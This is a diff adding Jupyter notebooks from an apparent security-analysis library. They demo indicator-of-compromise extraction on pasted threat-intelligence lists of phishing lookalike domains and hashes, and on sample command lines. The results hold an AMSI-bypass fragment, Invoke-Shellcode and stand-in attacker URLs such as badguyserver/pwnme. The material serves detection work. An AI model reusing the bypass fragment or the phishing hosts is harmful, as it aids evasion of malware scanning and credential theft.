+       "3      1         NaN            NaN     NaN        NaN            3  \n",
+       "4      1         NaN            NaN     NaN        NaN            4  "
+      ]
+     },
+     "execution_count": 11,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "input_df = data=process_tree.head(20)\n",
+    "output_df = ioc_extractor.extract(data=input_df, columns=['NewProcessName', 'CommandLine'])\n",
+    "# set the type of the SourceIndex column. In this case we are matching with the default numeric index.\n",
+    "output_df['SourceIndex'] = pd.to_numeric(output_df['SourceIndex'])\n",
+    "merged_df = pd.merge(left=input_df, right=output_df, how='outer', left_index=True, right_on='SourceIndex')\n",
+    "merged_df.head()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## IPython magic\n",
+    "\n",
+    "You can use the line magic `%ioc` or cell magic `%%ioc` to extract IoCs from text pasted directly into a cell\n",
+    "\n",
+    "The ioc magic supports the following options:\n",
+    "\n",
+    "```\n",
+    "--out OUT, -o OUT  \n",
+    "    The variable to return the results in the variable `OUT`\n",
+    "    Note: the output variable is a dictionary iocs grouped by IoC Type\n",
+    "--ioc_types IOC_TYPES, -i IOC_TYPES\n",
+    "    The types of IoC to search for (comma-separated string)\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 12,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:52:17.493379Z",
+     "start_time": "2020-02-10T19:52:17.483385Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "[('ipv4', ['1.2.3.4']),\n",
+       " ('dns',\n",
+       "  ['malcolmrifkind.site',\n",
+       "   'w3-schools.org',\n",
+       "   'niaconucil.org',\n",
+       "   'software-updating-managers.site',\n",
+       "   'isis-online.net',\n",
+       "   'accounts-drive.com',\n",
+       "   'cpanel-services.site',\n",
+       "   'service-activity-checkup.site',\n",
+       "   'service-issues.site',\n",
+       "   'recovery-options.site',\n",
+       "   'instagram-com.site',\n",
+       "   'mobile.phonechallenges-submit.site',\n",
+       "   'youtube.service-activity-checkup.site',\n",
+       "   'google.drive-accounts.com',\n",
+       "   'phonechallenges-submit.site',\n",
+       "   'drive-accounts.com',\n",
+       "   'www.phonechallenges-submit.site',\n",
+       "   'yah00.site',\n",
+       "   'seisolarpros.org',\n",
+       "   'customers-activities.site',\n",
+       "   'bahaius.info',\n",
+       "   'system-services.site',\n",
+       "   'two-step-checkup.site',\n",
+       "   'x09live-ix3b.account-profile-users.info',\n",
+       "   'customers-service.ddns.net',\n",
+       "   'leslettrespersanes.net',\n",
+       "   'www.drive-accounts.com',\n",
+       "   'acconut-verify.com',\n",
+       "   'finance-usbnc.info',\n",
+       "   'unirsd.com',\n",
+       "   'skynevvs.com',\n",
+       "   'inztaqram.ga']),\n",
+       " ('url',\n",
+       "  ['https://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password']),\n",
+       " ('windows_path', ['C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\bzzzzzz.txt']),\n",
+       " ('linux_path',\n",
+       "  ['//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\\t\\tFeb']),\n",
+       " ('md5_hash',\n",
+       "  ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]"
+      ]
+     },
+     "execution_count": 12,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "%%ioc --out ioc_capture\n",
+    "netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt\n",
+    "hostname\tcustomers-service.ddns.net\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "URL\thttps://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb 5, 2020, 2:20:35 PM\t\t1\t\n",
+    "hostname\tmobile.phonechallenges-submit.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "hostname\tyoutube.service-activity-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "hostname\twww.drive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "hostname\tgoogle.drive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "domain\tniaconucil.org\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tisis-online.net\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tbahaius.info\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tw3-schools.org\t\tFeb 5, 2020, 2:20:35 PM\t\t12\t\n",
+    "domain\tsystem-services.site\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\taccounts-drive.com\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tdrive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t10\t\n",
+    "domain\tservice-issues.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\ttwo-step-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tcustomers-activities.site\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tseisolarpros.org\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tyah00.site\t\tFeb 5, 2020, 2:20:35 PM\t\t4\t\n",
+    "domain\tskynevvs.com\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\trecovery-options.site\t\tFeb 5, 2020, 2:20:35 PM\t\t4\t\n",
+    "domain\tmalcolmrifkind.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tinstagram-com.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tleslettrespersanes.net\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tsoftware-updating-managers.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tcpanel-services.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tservice-activity-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "domain\tinztaqram.ga\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tunirsd.com\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tphonechallenges-submit.site\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "domain\tacconut-verify.com\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tfinance-usbnc.info\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "FileHash-MD5\t542128ab98bda5ea139b169200a50bce\t\tFeb 5, 2020, 2:20:35 PM\t\t3\t\n",
+    "FileHash-MD5\t3d67ce57aab4f7f917cf87c724ed7dab\t\tFeb 5, 2020, 2:20:35 PM\t\t3\t\n",
+    "hostname\tx09live-ix3b.account-profile-users.info\t\tFeb 6, 2020, 2:56:07 PM\t\t0\t\n",
+    "hostname\twww.phonechallenges-submit.site\t\tFeb 6, 2020, 2:56:07 PM"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T20:11:59.068838Z",
+     "start_time": "2020-02-10T20:11:59.063841Z"
+    }
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "[('ipv4', 1), ('dns', 32), ('url', 1), ('windows_path', 1), ('linux_path', 1), ('md5_hash', 2)]\n"
+     ]
+    }
+   ],
+   "source": [
+    "# Summarize captured types\n",
+    "print([(ioc, len(matches)) for ioc, matches in ioc_capture.items()])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 28,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T20:13:43.982346Z",
+     "start_time": "2020-02-10T20:13:43.976349Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "[('ipv4', ['1.2.3.4']),\n",
+       " ('linux_path',\n",
+       "  ['//two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\\t\\tFeb',\n",
+       "   '/usr/localbzzzzzz.sh']),\n",
+       " ('md5_hash',\n",
+       "  ['3d67ce57aab4f7f917cf87c724ed7dab', '542128ab98bda5ea139b169200a50bce'])]"
+      ]
+     },
+     "execution_count": 28,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "%%ioc --ioc_types \"ipv4, ipv6, linux_path, md5_hash\"\n",
+    "netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\Users\\user\\AppData\\Local\\Temp\\bzzzzzz.txt\n",
+    "tracefile2=/usr/localbzzzzzz.sh\n",
+    "hostname\tcustomers-service.ddns.net\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "URL\thttps://two-step-checkup.site/securemail/secureLogin/challenge/url?ucode=d50a3eb1-9a6b-45a8-8389-d5203bbddaa1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;service=mailservice&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;type=password\t\tFeb 5, 2020, 2:20:35 PM\t\t1\t\n",
+    "hostname\tmobile.phonechallenges-submit.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "hostname\tyoutube.service-activity-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "hostname\twww.drive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "hostname\tgoogle.drive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "domain\tniaconucil.org\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tisis-online.net\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tbahaius.info\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tw3-schools.org\t\tFeb 5, 2020, 2:20:35 PM\t\t12\t\n",
+    "domain\tsystem-services.site\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\taccounts-drive.com\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tdrive-accounts.com\t\tFeb 5, 2020, 2:20:35 PM\t\t10\t\n",
+    "domain\tservice-issues.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\ttwo-step-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tcustomers-activities.site\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tseisolarpros.org\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tyah00.site\t\tFeb 5, 2020, 2:20:35 PM\t\t4\t\n",
+    "domain\tskynevvs.com\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\trecovery-options.site\t\tFeb 5, 2020, 2:20:35 PM\t\t4\t\n",
+    "domain\tmalcolmrifkind.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tinstagram-com.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tleslettrespersanes.net\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tsoftware-updating-managers.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tcpanel-services.site\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tservice-activity-checkup.site\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "domain\tinztaqram.ga\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tunirsd.com\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "domain\tphonechallenges-submit.site\t\tFeb 5, 2020, 2:20:35 PM\t\t7\t\n",
+    "domain\tacconut-verify.com\t\tFeb 5, 2020, 2:20:35 PM\t\t11\t\n",
+    "domain\tfinance-usbnc.info\t\tFeb 5, 2020, 2:20:35 PM\t\t8\t\n",
+    "FileHash-MD5\t542128ab98bda5ea139b169200a50bce\t\tFeb 5, 2020, 2:20:35 PM\t\t3\t\n",
+    "FileHash-MD5\t3d67ce57aab4f7f917cf87c724ed7dab\t\tFeb 5, 2020, 2:20:35 PM\t\t3\t\n",
+    "hostname\tx09live-ix3b.account-profile-users.info\t\tFeb 6, 2020, 2:56:07 PM\t\t0\t\n",
+    "hostname\twww.phonechallenges-submit.site\t\tFeb 6, 2020, 2:56:07 PM"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Pandas Extension\n",
+    "\n",
+    "The decoding functionality is also available in a pandas extension `mp_ioc`.\n",
+    "This supports a single method `extract()`. \n",
+    "\n",
+    "This supports the same syntax\n",
+    "as `extract` (described earlier)."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-10T19:53:39.288669Z",
+     "start_time": "2020-02-10T19:53:39.245693Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>IoCType</th>\n",
+       "      <th>Observable</th>\n",
+       "      <th>SourceIndex</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>microsoft.com</td>\n",
+       "      <td>24</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://server/file.sct</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>server</td>\n",
+       "      <td>31</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>evil.ps</td>\n",
+       "      <td>35</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://somedomain/best-kitten-names-1.jpg'</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>somedomain</td>\n",
+       "      <td>37</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>6</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>blah.ps</td>\n",
+       "      <td>40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>40</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>blah.ps</td>\n",
+       "      <td>41</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</td>\n",
+       "      <td>41</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>10</th>\n",
+       "      <td>md5_hash</td>\n",
+       "      <td>81ed03caf6901e444c72ac67d192fb9c</td>\n",
+       "      <td>44</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>11</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://badguyserver/pwnme</td>\n",
+       "      <td>46</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>12</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>badguyserver</td>\n",
+       "      <td>46</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>13</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://badguyserver/pwnme</td>\n",
+       "      <td>47</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>14</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>badguyserver</td>\n",
+       "      <td>47</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>15</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>Invoke-Shellcode.ps</td>\n",
+       "      <td>48</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>16</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>Invoke-ReverseDnsLookup.ps</td>\n",
+       "      <td>49</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>Wscript.Shell</td>\n",
+       "      <td>67</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>18</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...</td>\n",
+       "      <td>77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>19</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...</td>\n",
+       "      <td>77</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>20</th>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>1.2.3.4</td>\n",
+       "      <td>78</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>21</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>wscript.shell</td>\n",
+       "      <td>81</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>22</th>\n",
+       "      <td>dns</td>\n",
+       "      <td>abc.com</td>\n",
+       "      <td>90</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>23</th>\n",
+       "      <td>ipv4</td>\n",
+       "      <td>127.0.0.1</td>\n",
+       "      <td>102</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>24</th>\n",
+       "      <td>url</td>\n",
+       "      <td>http://127.0.0.1/</td>\n",
+       "      <td>102</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>25</th>\n",
+       "      <td>win_named_pipe</td>\n",
+       "      <td>\\\\.\\pipe\\blahtest\"</td>\n",
+       "      <td>107</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "           IoCType  \\\n",
+       "0              dns   \n",
+       "1              url   \n",
+       "2              dns   \n",
+       "3              dns   \n",
+       "4              url   \n",
+       "5              dns   \n",
+       "6              dns   \n",
+       "7         md5_hash   \n",
+       "8              dns   \n",
+       "9         md5_hash   \n",
+       "10        md5_hash   \n",
+       "11             url   \n",
+       "12             dns   \n",
+       "13             url   \n",
+       "14             dns   \n",
+       "15             dns   \n",
+       "16             dns   \n",
+       "17             dns   \n",
+       "18             url   \n",
+       "19             dns   \n",
+       "20            ipv4   \n",
+       "21             dns   \n",
+       "22             dns   \n",
+       "23            ipv4   \n",
+       "24             url   \n",
+       "25  win_named_pipe   \n",
+       "\n",
+       "                                                                                             Observable  \\\n",
+       "0                                                                                         microsoft.com   \n",
+       "1                                                                                http://server/file.sct   \n",
+       "2                                                                                                server   \n",
+       "3                                                                                               evil.ps   \n",
+       "4                                                            http://somedomain/best-kitten-names-1.jpg'   \n",
+       "5                                                                                            somedomain   \n",
+       "6                                                                                               blah.ps   \n",
+       "7                                                                      aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   \n",
+       "8                                                                                               blah.ps   \n",
+       "9                                                                      aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa   \n",
+       "10                                                                     81ed03caf6901e444c72ac67d192fb9c   \n",
+       "11                                                                            http://badguyserver/pwnme   \n",
+       "12                                                                                         badguyserver   \n",
+       "13                                                                            http://badguyserver/pwnme   \n",
+       "14                                                                                         badguyserver   \n",
+       "15                                                                                  Invoke-Shellcode.ps   \n",
+       "16                                                                           Invoke-ReverseDnsLookup.ps   \n",
+       "17                                                                                        Wscript.Shell   \n",
+       "18  http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se...   \n",
+       "19  system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(...   \n",
+       "20                                                                                              1.2.3.4   \n",
+       "21                                                                                        wscript.shell   \n",
+       "22                                                                                              abc.com   \n",
+       "23                                                                                            127.0.0.1   \n",
+       "24                                                                                    http://127.0.0.1/   \n",
+       "25                                                                                   \\\\.\\pipe\\blahtest\"   \n",
+       "\n",
+       "    SourceIndex  \n",
+       "0            24  \n",
+       "1            31  \n",
+       "2            31  \n",
+       "3            35  \n",
+       "4            37  \n",
+       "5            37  \n",
+       "6            40  \n",
+       "7            40  \n",
+       "8            41  \n",
+       "9            41  \n",
+       "10           44  \n",
+       "11           46  \n",
+       "12           46  \n",
+       "13           47  \n",
+       "14           47  \n",
+       "15           48  \n",
+       "16           49  \n",
+       "17           67  \n",
+       "18           77  \n",
+       "19           77  \n",
+       "20           78  \n",
+       "21           81  \n",
+       "22           90  \n",
+       "23          102  \n",
+       "24          102  \n",
+       "25          107  "
+      ]
+     },
+     "execution_count": 19,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "process_tree.mp_ioc.extract(columns=['CommandLine'])"
+   ]
+  }
+ ],
+ "metadata": {
+  "celltoolbar": "Tags",
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python [conda env:condadev] *",
+   "language": "python",
+   "name": "conda-env-condadev-py"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.5"
+  },
+  "latex_envs": {
+   "LaTeX_envs_menu_present": true,
+   "autoclose": false,
+   "autocomplete": true,
+   "bibliofile": "biblio.bib",
+   "cite_by": "apalike",
+   "current_citInitial": 1,
+   "eqLabelWithNumbers": true,
+   "eqNumInitial": 1,
+   "hotkeys": {
+    "equation": "Ctrl-E",
+    "itemize": "Ctrl-I"
+   },
+   "labels_anchors": false,
+   "latex_user_defs": false,
+   "report_style_numbering": false,
+   "user_envs_cfg": false
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {
+    "height": "318.996px",
+    "width": "320.994px"
+   },
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": false,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "165px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "position": {
+    "height": "406.193px",
+    "left": "1468.4px",
+    "right": "20px",
+    "top": "120px",
+    "width": "456.572px"
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
\ No newline at end of file
diff --git a/docs/notebooks/MDATPQuery.ipynb b/docs/notebooks/MDATPQuery.ipynb
new file mode 100644
index 000000000..b771a0fc8
--- /dev/null
+++ b/docs/notebooks/MDATPQuery.ipynb
@@ -0,0 +1,1734 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Querying MDATP Data\n",
+    "\n",
+    "<h2 style=\"color: red; border: solid; padding: 5pt\">This version of the notebook is deprecated<br>\n",
+    "Please see MicrosoftDefender.ipynb</h2>\n",
+    "\n",
+    "MSTICpy versions > 0.3.0\n",
+    "\n",
+    "### Description\n",
+    "This Notebook provides details and examples of how to connect to and query data from the MDATP Advanced Hunting API.\n",
+    "\n",
+    "### Installation"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "%pip install --upgrade msticpy"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Authentication\n",
+    "\n",
+    "Authentication for the MDATP Advanced Hunting API is handled via an Azure AD application. Before you can authenticate you will need to register an application and provide it with the required permissions. MSTICpy supports Application Context authentication to the API.\n",
+    "Detailed instructions on registering an application can be found here: https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/exposed-apis-create-app-webapp\n",
+    "\n",
+    "Once created you will require the following details:\n",
+    "* Application (client) ID\n",
+    "* Directory (tenant) ID\n",
+    "* Client secret\n",
+    "\n",
+    "These details can be found in the Azure Portal under Azure Active Directory > App Registrations.\n",
+    "\n",
+    "Once collected the easiest way to manage these details is via msticpyconfig.yaml - simply add them to the file in the following format:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "'''\n",
+    "MDATPApp:\n",
+    "  Args:\n",
+    "    clientId: \"{Application (client) ID}\"\n",
+    "    clientSecret: \"{Client Secret}\"\n",
+    "    tenantId: \"{Directory (tenant) ID}\"\n",
+    "'''"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "You can then initialize a data provider for MDATP and connect the provider:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 5,
+   "metadata": {
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Connected.\n"
+     ]
+    },
+    {
+     "data": {
+      "text/plain": [
+       "{'token_type': 'Bearer',\n",
+       " 'expires_in': '3599',\n",
+       " 'ext_expires_in': '3599',\n",
+       " 'expires_on': '1578009447',\n",
+       " 'not_before': '1578005547',\n",
+       " 'resource': 'https://api.securitycenter.windows.com',\n",
+       " 'access_token': None}"
+      ]
+     },
+     "execution_count": 5,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "from msticpy.data.data_providers import QueryProvider\n",
+    "mdatp_prov = QueryProvider('MDATP')\n",
+    "#app_name is the value of the heading in msticpyconfig.yaml that the app details are stored under.\n",
+    "mdatp_prov.connect(app_name=\"MDATPApp\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Once connected the MDATP data connector functions in a similar manner to other data connectors. You can list queries:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 9,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "['MDATP.file_path',\n",
+       " 'MDATP.host_alerts',\n",
+       " 'MDATP.host_connections',\n",
+       " 'MDATP.ip_alerts',\n",
+       " 'MDATP.ip_connections',\n",
+       " 'MDATP.list_alerts',\n",
+       " 'MDATP.list_connections',\n",
+       " 'MDATP.list_filehash',\n",
+       " 'MDATP.list_files',\n",
+       " 'MDATP.list_host_processes',\n",
+       " 'MDATP.process_cmd_line',\n",
+       " 'MDATP.process_creations',\n",
+       " 'MDATP.process_paths',\n",
+       " 'MDATP.protocol_connections',\n",
+       " 'MDATP.sha1_alerts',\n",
+       " 'MDATP.url_alerts',\n",
+       " 'MDATP.url_connections',\n",
+       " 'MDATP.user_files',\n",
+       " 'MDATP.user_logons',\n",
+       " 'MDATP.user_network',\n",
+       " 'MDATP.user_processes',\n",
